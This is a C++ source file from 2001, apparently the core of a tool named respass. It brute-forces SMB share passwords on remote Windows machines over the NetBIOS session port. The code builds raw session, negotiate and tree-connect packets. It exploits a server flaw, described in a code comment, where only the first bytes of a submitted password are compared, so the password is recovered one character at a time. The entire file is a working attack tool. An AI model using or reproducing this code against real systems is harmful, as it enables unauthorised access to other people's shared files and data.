/* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
 *
 * By using this code and algorithm, you agree that you are completely
 * responisble for your own actions. LAN tools project, and I, Nickolsky Artyom, are in no way
 * liable for any actions taken using this code and algorithm.
 *
 *  Copyright 2001 LAN tools project. 
 *  Copyright 2001 Nickolsky Artyom.
 * E-mail: nickolsky@yandex.ru
 * URL: http://lantools.narod.ru
 */

#include"respass.h"


CSocket sSocket;
CString sCharSet( "1234567890QWERTYUIOPASDFGHJKLZXCVBNM" );
CString sMachineName( "UNKNOWN" );

/////////////////////////////////////////////////////////////////////////////
// Socket creation and connection to required host using netbios session port
// Input parameters : machine netbios name, ip address

BOOL OpenSMBConnection( CString sName, CString sAddress)
{	
	int iRes = sSocket.Create( );
	if( iRes != 0 )
	{
		sMachineName = sName;
		sMachineName.AnsiToOem( );
		sMachineName.MakeUpper( );
		iRes = sSocket.Connect( ( LPCTSTR )sAddress, NETBIOS_SESSION_PORT );	
		if( iRes == 0 )
			CloseSMBConnection( );
		else
			return iRes;
	}
	CloseSMBConnection( );
	return false;
}

/////////////////////////////////////////////////////////////////////////////
// Socket closing

void CloseSMBConnection( )
{
	sSocket.Close( );
}

/////////////////////////////////////////////////////////////////////////////
// Char set for password resolution setting
// Input parameters : string with required characters

void SetCharSet( CString sChars )
{
	sCharSet = "" + sChars;
}

/////////////////////////////////////////////////////////////////////////////
// Main password resolution function
// Input parameters : resource name, 
//                    pointer to variable of BOOL type to get result status
// Return value : string with password

CString ResolveSMBPassword( CString sResource, BOOL * iResult )
{
	BOOL isResolved = false, isFinished = true;
	CString sResourceOem;	
	sResourceOem = "" + sResource;
	sResourceOem.AnsiToOem( );
	sResourceOem.MakeUpper( );
	CString sResourcePath = "\\\\"+sMachineName+"\\"+sResourceOem;
	CString sPassword("");
	SendSMBSessionRequest();
	if( GetSMBSessionResponce( ) )
	{
		SendSMBNegotiateRequest( );
		if( GetSMBNegotiationResponce( ) )
		{
			sCharSet.AnsiToOem( );
			do
			{
				isFinished = true;
				for( int i = 0; i < strlen( sCharSet ); i++ )
				{
					SendSMBConnectionRequest( sResourcePath, sPassword + sCharSet.GetAt( i ), FALSE );
					if( GetSMBConnectionResponce( ) )
					{
						sPassword += sCharSet.GetAt( i );
						SendSMBConnectionRequest( sResourcePath, sPassword, TRUE );
						isResolved = GetSMBConnectionResponce( );
						isFinished = false;
						break;
					}
				}
			}while( (isResolved == false) && ( isFinished == false ) );
			sCharSet.OemToAnsi( );
		}
	}
	sPassword.OemToAnsi( );
	*iResult = isResolved;
	return sPassword;
}

/////////////////////////////////////////////////////////////////////////////
// Name conversion
// Input parameters : pointer to buffer with name to convert, 
//                    pointer to buffer with result ( size should be 33 bytes )

void NameNormalToSmb ( char * sIn, char * sOut )
{
	sOut[ 0 ] = 0x20;
	int i;
	for( i = 0; i < strlen( sIn ); i++ )
	{
		sOut[ i * 2 + 1 ] = sIn[ i ] / 16 + 65;
		sOut[ i * 2 + 2 ] = sIn[ i ] - ( ( sIn[ i ] / 16 ) * 16 ) + 65;
		//sOut[ i / 2 ] = abs(sIn[ i ] - 65 )*16 + abs( sIn[ i + 1 ] - 65 );
	}
	for( ; i < 16; i++ )
	{
		sOut[ i * 2 + 1 ] = 0x43;
		sOut[ i * 2 + 2 ] = 0x41;
	}
	sOut[ 33 ] = 0;
}


/////////////////////////////////////////////////////////////////////////////
// Function for sending of SMB session request

void SendSMBSessionRequest( )
{
	sNBTNewSessionPacket nbtNewSession;
	nbtNewSession.header.bPacketType = NBT_SESSION_REQUEST;
	nbtNewSession.header.bFlags = 0;
	nbtNewSession.header.wPacketLength = 0x44;
	DWORD dwSize = 17;
	char sMyName[ 17 ];
	strcpy( sMyName, "UNKNOWN" );
	GetComputerName( sMyName, &dwSize );
	NameNormalToSmb( ( char * )( LPCTSTR )sMachineName, nbtNewSession.calledName );
	NameNormalToSmb( ( char * )( LPCTSTR )sMyName, nbtNewSession.callingName );
	sSocket.Send( &nbtNewSession, sizeof(nbtNewSession) );
}

/////////////////////////////////////////////////////////////////////////////
// Function for retrieval of responce to SMB session request
// Return value: true if session creation was successfull

BOOL GetSMBSessionResponce( )
{
	unsigned char sBuf[1500];
	int iRes, iError;
  fd_set readfds;
  TIMEVAL timeout;

  FD_ZERO(&readfds);
  FD_SET(sSocket.m_hSocket,&readfds);
  timeout.tv_sec = 3;
  timeout.tv_usec = 0;
  iError = select(0,&readfds,NULL,NULL,&timeout);

  if (iError == SOCKET_ERROR) return FALSE;
  
	if (!FD_ISSET(sSocket.m_hSocket,&readfds)) return FALSE;
	
	iRes = sSocket.Receive( sBuf, 1500 );
	if( ( iRes != SOCKET_ERROR ) && ( iRes != 0 ) )
	{
		if( sBuf[0] == NBT_SESSION_SUCCESS )
			return TRUE;
		else
			return FALSE;
	}
}

/////////////////////////////////////////////////////////////////////////////
// Function for sending of SMB negotiation request

void SendSMBNegotiateRequest( )
{
	SSMBNegotiate smbNegotiate;
	smbNegotiate.nbtHeader.bFlags = 0;
	smbNegotiate.nbtHeader.bPacketType = NBT_SESSION_MESSAGE;
	smbNegotiate.nbtHeader.wPacketLength = 0x6E00;
	smbNegotiate.smbHeader.wTreeId = 0;
	smbNegotiate.smbHeader.wProcessId = GetCurrentProcessId( );
	smbNegotiate.smbHeader.wUserId = 0;
	smbNegotiate.smbHeader.wMultiplexId = 0;
	smbNegotiate.smbHeader.bFlags = 0x18;
	smbNegotiate.smbHeader.wFlags2 = 0x5308;
	smbNegotiate.smbHeader.bCommand = SMB_COMMAND_CNEGOTIATE;
	smbNegotiate.smbHeader.bType = 0xFF;
	smbNegotiate.smbHeader.sTitle[0] = 'S';
	smbNegotiate.smbHeader.sTitle[1] = 'M';
	smbNegotiate.smbHeader.sTitle[2] = 'B';
	FillMemory( smbNegotiate.smbHeader.bData, 12, 0 );
	smbNegotiate.smbHeader.Status.bData = 0;
	smbNegotiate.smbHeader.Status.bErrorClass = 0;
	smbNegotiate.smbHeader.Status.wErrorCode = 0;
	smbNegotiate.negotiateHeader.bWordCount = 0;
	smbNegotiate.negotiateHeader.wByteCount = 0x4B;
	smbNegotiate.sData[0] = 2;
	char * sPtr;
	sPtr = smbNegotiate.sData + 1;
	strcpy( sPtr, "PC NETWORJ PROGRAM 1.0" );
	sPtr += strlen( sPtr ) + 1;
	sPtr[0]  = 2;
	sPtr += 1;
	strcpy( sPtr, "LANMAN1.0" );
	sPtr += strlen( sPtr ) + 1;
	sPtr[0]  = 2;
	sPtr += 1;
	strcpy( sPtr, "Windows for Workgroupu 3.1a" );
	sPtr += strlen( sPtr ) + 1;
	sPtr[0]  = 2;
	sPtr += 1;
	strcpy( sPtr, "NNNN2X222" );
	sSocket.Send( &smbNegotiate, 0x72 );
}

/////////////////////////////////////////////////////////////////////////////
// Function for retrieval of responce to SMB negotiation request
// Return value: true if negotiation was successfull

BOOL GetSMBNegotiationResponce( )
{
	unsigned char sBuf[1500];
	int iRes, iError;
  fd_set readfds;
  TIMEVAL timeout;

  FD_ZERO(&readfds);
  FD_SET(sSocket.m_hSocket,&readfds);
  timeout.tv_sec = 3;
  timeout.tv_usec = 0;
  iError = select(0,&readfds,NULL,NULL,&timeout);

  if (iError == SOCKET_ERROR) return FALSE;
  
	if (!FD_ISSET(sSocket.m_hSocket,&readfds)) return FALSE;

	iRes = sSocket.Receive( sBuf, 1500 );
	if( ( iRes != SOCKET_ERROR ) && ( iRes != 0 ) )
	{
		if( ( sBuf[8] == SMB_COMMAND_CNEGOTIATE ) && ( sBuf[9] == 0 ) )
			return TRUE;
		else
			return FALSE;
	}
	return true;
}

/////////////////////////////////////////////////////////////////////////////
// Function for sending of SMB connection request
// Input parameters: resource name, password, "isNullTerminated" flag
// This function is used for opening required share
// "isNullTerminated" flag is true if we want to open share with known password
// and else if we want to check for equality of OUR password 
// to first strlen( sPassword ) bytes of REAL password

void SendSMBConnectionRequest( CString sResource, CString sPassword, BOOL isNullTerminated )
{
	SSMBTreeConnect smbTreeConnect;
	smbTreeConnect.nbtHeader.bFlags = 0;
	smbTreeConnect.nbtHeader.bPacketType = NBT_SESSION_MESSAGE;
	int iSizeModifier = 0;
	if( isNullTerminated )
		iSizeModifier = 1;	
	smbTreeConnect.nbtHeader.wPacketLength = sizeof( SSMBPacket ) + sizeof( SSMBTreeConnectHeader ) + strlen( sPassword ) + iSizeModifier + strlen( sResource ) + 7;
	smbTreeConnect.nbtHeader.wPacketLength = MAKEWORD( HIBYTE( smbTreeConnect.nbtHeader.wPacketLength ), LOBYTE( ( smbTreeConnect.nbtHeader.wPacketLength ) ) );
	smbTreeConnect.smbHeader.wTreeId = 0;
	smbTreeConnect.smbHeader.wProcessId = GetCurrentProcessId( );
	smbTreeConnect.smbHeader.wUserId = 0;
	smbTreeConnect.smbHeader.wMultiplexId = 0;
	smbTreeConnect.smbHeader.bFlags = 0x18;
	smbTreeConnect.smbHeader.wFlags2 = 0x800;
	smbTreeConnect.smbHeader.bCommand = SMB_COMMAND_CTREECONNECT;
	smbTreeConnect.smbHeader.bType = 0xFF;
	smbTreeConnect.smbHeader.sTitle[0] = 'S';
	smbTreeConnect.smbHeader.sTitle[1] = 'M';
	smbTreeConnect.smbHeader.sTitle[2] = 'B';
	FillMemory( smbTreeConnect.smbHeader.bData, 12, 0 );
	smbTreeConnect.smbHeader.Status.bData = 0;
	smbTreeConnect.smbHeader.Status.bErrorClass = 0;
	smbTreeConnect.smbHeader.Status.wErrorCode = 0;
	smbTreeConnect.treeHeader.bWordCount = 4;
	smbTreeConnect.treeHeader.wParam = 0xFF;
	smbTreeConnect.treeHeader.wNextOffset = 0;
	smbTreeConnect.treeHeader.wDisconnectFlag = 0;
	smbTreeConnect.treeHeader.wPasswordLength = strlen( sPassword ) + iSizeModifier;
	smbTreeConnect.treeHeader.wByteCount = strlen( sPassword ) + iSizeModifier + strlen( sResource ) + 7;
	char * sPtr;
	if( !isNullTerminated )
	{
		strcpy( smbTreeConnect.sData, sPassword );
		strcat( smbTreeConnect.sData, sResource );
		sPtr = smbTreeConnect.sData + strlen( smbTreeConnect.sData ) + 1;
	}
	else
	{
		strcpy( smbTreeConnect.sData, sPassword );
		sPtr = smbTreeConnect.sData + strlen( smbTreeConnect.sData ) + 1;
		strcpy( smbTreeConnect.sData + strlen( sPassword ) + 1, sResource );
		sPtr += strlen( sPtr ) + 1;
	}
	strcpy( sPtr, "?????" );
	sSocket.Send( &smbTreeConnect, sizeof(SNBTPacketSM) + sizeof( SSMBPacket ) + sizeof( SSMBTreeConnectHeader ) + strlen( sPassword ) + iSizeModifier + strlen( sResource ) + 7 );
}	

/////////////////////////////////////////////////////////////////////////////
// Function for retrieval of responce to SMB connetion request
// Return value: true if connection was successfull

BOOL GetSMBConnectionResponce( )
{
	unsigned char sBuf[1500];
	int iRes, iError;
  fd_set readfds;
  TIMEVAL timeout;

  FD_ZERO(&readfds);
  FD_SET(sSocket.m_hSocket,&readfds);
  timeout.tv_sec = 3;
  timeout.tv_usec = 0;
  iError = select(0,&readfds,NULL,NULL,&timeout);

  if (iError == SOCKET_ERROR) return FALSE;
  
	if (!FD_ISSET(sSocket.m_hSocket,&readfds)) return FALSE;

	iRes = sSocket.Receive( sBuf, 1500 );
	if( ( iRes != SOCKET_ERROR ) && ( iRes != 0 ) )
	{
		if( ( sBuf[8] == SMB_COMMAND_CTREECONNECT ) && ( sBuf[9] == 0 ) )
			return TRUE;
		else
			return FALSE;
	}
	return true;
}